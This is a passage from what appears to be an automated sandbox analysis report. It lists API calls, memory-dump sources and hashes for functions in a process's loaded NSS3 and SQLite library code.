Part of subcall function 6CCF1560: PR_Unlock.NSS3(?,?,?,?,6CCC0844,?), ref: 6CCF15B2

Part of subcall function 6CCBB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CCC1397,00000000,?,6CCBCF93,5B5F5EC0,00000000,?,6CCC1397,?), ref: 6CCBB1CB
Part of subcall function 6CCBB1A0: free.MOZGLUE(5B5F5EC0,?,6CCBCF93,5B5F5EC0,00000000,?,6CCC1397,?), ref: 6CCBB1D2

Part of subcall function 6CCB89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CCB88AE,-00000008), ref: 6CCB8A04
Part of subcall function 6CCB89E0: EnterCriticalSection.KERNEL32(?), ref: 6CCB8A15
Part of subcall function 6CCB89E0: memset.VCRUNTIME140(6CCB88AE,00000000,00000132), ref: 6CCB8A27
Part of subcall function 6CCB89E0: PR_Unlock.NSS3(?), ref: 6CCB8A35

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 6443c172f8b5a6cf826d03c7914a80e57be9e8963fe7cb5733f6afad5bf90b40
Instruction ID: 6dd718657ae87e4547bc0892c471aa1ad9c747307c9fc3b10fc9f64eb314e8af
Opcode Fuzzy Hash: 6443c172f8b5a6cf826d03c7914a80e57be9e8963fe7cb5733f6afad5bf90b40
Instruction Fuzzy Hash: CA51A9B6E002015FEB009F69DC81AAB37A8EF4A21CF150474ED1597B12FB31ED1997E2

Function 6CC96E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CC96ED8
sqlite3_value_text.NSS3(?,?), ref: 6CC96EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CC96FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CC96FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CC96FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CC97010
sqlite3_value_blob.NSS3(?,?), ref: 6CC9701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CC97052

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: c9920ed051f3f46b3b5bb2efad9c14d9b81f9025052bfe29e5c431a372a54c3e
Instruction ID: 4854a759aeaf79fbcb11baa211137e303b9333d8634e4c2f72de103a9c58f331
Opcode Fuzzy Hash: c9920ed051f3f46b3b5bb2efad9c14d9b81f9025052bfe29e5c431a372a54c3e
Instruction Fuzzy Hash: 6E61C2B1E0560A8BDB40CF65C8407EEB7B2BF85308F184165D416EBB91F7369D16CBA0

Function 6CD08F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CD07313), ref: 6CD08FBB

Part of subcall function 6CD007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CCA8298,?,?,?,6CC9FCE5,?), ref: 6CD007BF
Part of subcall function 6CD007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CD007E6
Part of subcall function 6CD007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD0081B
Part of subcall function 6CD007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD00825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CD07313), ref: 6CD09012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CD07313), ref: 6CD0903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CD07313), ref: 6CD0909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CD07313), ref: 6CD090DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CD07313), ref: 6CD090F1

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CD07313), ref: 6CD0906B

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CD07313), ref: 6CD09128

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 9a02dfd61b0d89d8cbd2049c5da4e0707142de584de14dec25029d65976dd43e
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: DA515F71B00201DBEB10DF6EDC84B26B3F5AF44358F154169E955D7B72EB72E804CAA2

Function 6CCC4E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CCC4E90
EnterCriticalSection.KERNEL32 ref: 6CCC4EA9
TlsGetValue.KERNEL32 ref: 6CCC4EC6
EnterCriticalSection.KERNEL32 ref: 6CCC4EDF
PL_HashTableLookup.NSS3 ref: 6CCC4EF8
PR_Unlock.NSS3 ref: 6CCC4F05
PR_Now.NSS3 ref: 6CCC4F13
PR_Unlock.NSS3 ref: 6CCC4F3A

Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907AD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907CD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907D6
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CC2204A), ref: 6CC907E4
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,6CC2204A), ref: 6CC90864
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CC90880
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,6CC2204A), ref: 6CC908CB
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908D7
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908FB

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: b00b27de31118af9735d8a7b536c8a8801459d148e2a21f84b97f9b42c3b6b31
Instruction ID: 8d949cc58a36d58fd22c4e7ce3be6c2089ca1a8b4798572e228da4c31fad48fe
Opcode Fuzzy Hash: b00b27de31118af9735d8a7b536c8a8801459d148e2a21f84b97f9b42c3b6b31
Instruction Fuzzy Hash: 8F4148B4A006059FDB00EF69D4848AABBF4FF49354B01C569ED999B710EB30E895CB92

Function 6CD18C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD18C93

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

Part of subcall function 6CCF8A60: TlsGetValue.KERNEL32(6CCA61C4,?,6CCA5F9C,00000000), ref: 6CCF8A81
Part of subcall function 6CCF8A60: TlsGetValue.KERNEL32(?,?,?,6CCA5F9C,00000000), ref: 6CCF8A9E
Part of subcall function 6CCF8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CCA5F9C,00000000), ref: 6CCF8AB7
Part of subcall function 6CCF8A60: PR_Unlock.NSS3(?,?,?,?,?,6CCA5F9C,00000000), ref: 6CCF8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6CD18CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6CD18D10

Part of subcall function 6CCF8970: TlsGetValue.KERNEL32(?,00000000,6CCA61C4,?,6CCA5639,00000000), ref: 6CCF8991
Part of subcall function 6CCF8970: TlsGetValue.KERNEL32(?,?,?,?,?,6CCA5639,00000000), ref: 6CCF89AD
Part of subcall function 6CCF8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CCA5639,00000000), ref: 6CCF89C6
Part of subcall function 6CCF8970: PR_WaitCondVar.NSS3 ref: 6CCF89F7
Part of subcall function 6CCF8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CCA5639,00000000), ref: 6CCF8A0C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 0e68829cdfc5d7b77b58b8e43e5f7344681ded34eb264a396ec0dd59d0ffdc32
Instruction ID: 0614f5b51ff4e2d348822b14692a761f8bb599fd283b6e17cef7bb97b5aef289
Opcode Fuzzy Hash: 0e68829cdfc5d7b77b58b8e43e5f7344681ded34eb264a396ec0dd59d0ffdc32
Instruction Fuzzy Hash: 16B16DB0D043089FDB14CF65DC90AAEB7BAFF49308F10412EE91AA7B61E731A955CB51

Function 6CC24F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC24FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC251BB

Strings

unable to delete/modify user-function due to active statements, xrefs: 6CC251DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC251A5
misuse, xrefs: 6CC251AF
%s at line %d of [%.10s], xrefs: 6CC251B4

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 3ff5557b2f7545adc5d766ecfd1d20e9b25985aea67bfddb6f28bc2ef021d1d5
Instruction ID: 4b4d16fd52edfbdae7c65ab5232e161d1a2b5cc2e99ced0ee5d91f4df68a9f76
Opcode Fuzzy Hash: 3ff5557b2f7545adc5d766ecfd1d20e9b25985aea67bfddb6f28bc2ef021d1d5
Instruction Fuzzy Hash: 117190B57042099BEB00CF55CC80B9BB7B5BF48308F054524FD199BA99E739EC55CBA1

Function 6CC92D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CC92D69

Strings

winUnmapfile1, xrefs: 6CC92F55
winTruncate2, xrefs: 6CC92EF8
winSeekFile, xrefs: 6CC92E9C
winTruncate1, xrefs: 6CC92EBE
winUnmapfile2, xrefs: 6CC92F7F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: c5a478c11127e78033425ae6a264ec210dbd8753abd8efe3703da6f51b98c20f
Instruction ID: 57b89571ca5768a46d7cdd31e2b9086f01f067308acafd2f60f547d83fbb9d63
Opcode Fuzzy Hash: c5a478c11127e78033425ae6a264ec210dbd8753abd8efe3703da6f51b98c20f
Instruction Fuzzy Hash: EF619071B012059FEB04CF68DC94B6A77B5FF49314F10812DE956ABB90EB31AD06CB91

Function 6CCEAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CCEAB3E,?,?,?), ref: 6CCEAC35

Part of subcall function 6CCCCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CCCCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CCEAB3E,?,?,?), ref: 6CCEAC55

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CCEAB3E,?,?), ref: 6CCEAC70

Part of subcall function 6CCCE300: TlsGetValue.KERNEL32 ref: 6CCCE33C
Part of subcall function 6CCCE300: EnterCriticalSection.KERNEL32(?), ref: 6CCCE350
Part of subcall function 6CCCE300: PR_Unlock.NSS3(?), ref: 6CCCE5BC
Part of subcall function 6CCCE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CCCE5CA
Part of subcall function 6CCCE300: TlsGetValue.KERNEL32 ref: 6CCCE5F2
Part of subcall function 6CCCE300: EnterCriticalSection.KERNEL32(?), ref: 6CCCE606
Part of subcall function 6CCCE300: PORT_Alloc_Util.NSS3(?), ref: 6CCCE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CCEAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCEAB3E), ref: 6CCEACD7
PORT_Alloc_Util.NSS3(?), ref: 6CCEAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CCEAD2B

Part of subcall function 6CCCF360: TlsGetValue.KERNEL32(00000000,?,6CCEA904,?), ref: 6CCCF38B
Part of subcall function 6CCCF360: EnterCriticalSection.KERNEL32(?,?,?,6CCEA904,?), ref: 6CCCF3A0
Part of subcall function 6CCCF360: PR_Unlock.NSS3(?,?,?,?,6CCEA904,?), ref: 6CCCF3D3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 5106fa53c8c393a014f6c317794dffb5c6713329ea212f25ea8fa90ecaf50e90
Instruction ID: 7236b748f40b6c21f20f977561c3c434bed6bcd13af84a5e0e4131bf14f6da1d
Opcode Fuzzy Hash: 5106fa53c8c393a014f6c317794dffb5c6713329ea212f25ea8fa90ecaf50e90
Instruction Fuzzy Hash: EF3119B1E006156FEB00DF698C419AF7BB6EFC9728B198128E81597B40FB31DD15C7A1

Function 6CCC8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CCC8C7C

Part of subcall function 6CD69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DC6
Part of subcall function 6CD69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DD1
Part of subcall function 6CD69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CD69DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCC8CB0
TlsGetValue.KERNEL32 ref: 6CCC8CD1
EnterCriticalSection.KERNEL32(?), ref: 6CCC8CE5
PR_Unlock.NSS3(?), ref: 6CCC8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CCC8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCC8D93

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 4fc79452af4a39826515dfbdf55891360f8bfc40087c3947e1c5f4f6718bfaa9
Instruction ID: 62866a5d3b7b6ae7db09de27832f49faa6a8f10a0e4e0d2032db833a97986c6f
Opcode Fuzzy Hash: 4fc79452af4a39826515dfbdf55891360f8bfc40087c3947e1c5f4f6718bfaa9
Instruction Fuzzy Hash: 38312671F01202AFEB009F69DC44B9BB7B4BF55318F14013AEA1967B90E771A964C7D2

Function 6CCC2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CCBE728,?,00000038,?,?,00000000), ref: 6CCC2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCC2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCC2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CCC2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CCC2E9E
PR_Unlock.NSS3(?), ref: 6CCC2EAB
PR_Unlock.NSS3(?), ref: 6CCC2F0D

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 2db39e8e10ef4de81666e3474c40627b628cdfb9cccc14851234561b59407259
Instruction ID: 7c3218cde91f208e256e97c5b53b80e5672f7314601d5c45286ae51e6b1b57f3
Opcode Fuzzy Hash: 2db39e8e10ef4de81666e3474c40627b628cdfb9cccc14851234561b59407259
Instruction Fuzzy Hash: 3131D6B9B00205ABEB009F68EC54876BB79FF45259B048168ED18D7B11F731EC65C7E2

Function 6CD0CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CD0CD93,?), ref: 6CD0CEEE

Part of subcall function 6CD014C0: TlsGetValue.KERNEL32 ref: 6CD014E0
Part of subcall function 6CD014C0: EnterCriticalSection.KERNEL32 ref: 6CD014F5
Part of subcall function 6CD014C0: PR_Unlock.NSS3 ref: 6CD0150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CD0CD93,?), ref: 6CD0CEFC

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CD0CD93,?), ref: 6CD0CF0B

Part of subcall function 6CD00840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD008B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CD0CD93,?), ref: 6CD0CF1D

Part of subcall function 6CCFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CCF8D2D,?,00000000,?), ref: 6CCFFB85
Part of subcall function 6CCFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CCFFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CD0CD93,?,?,?,?,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF78

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

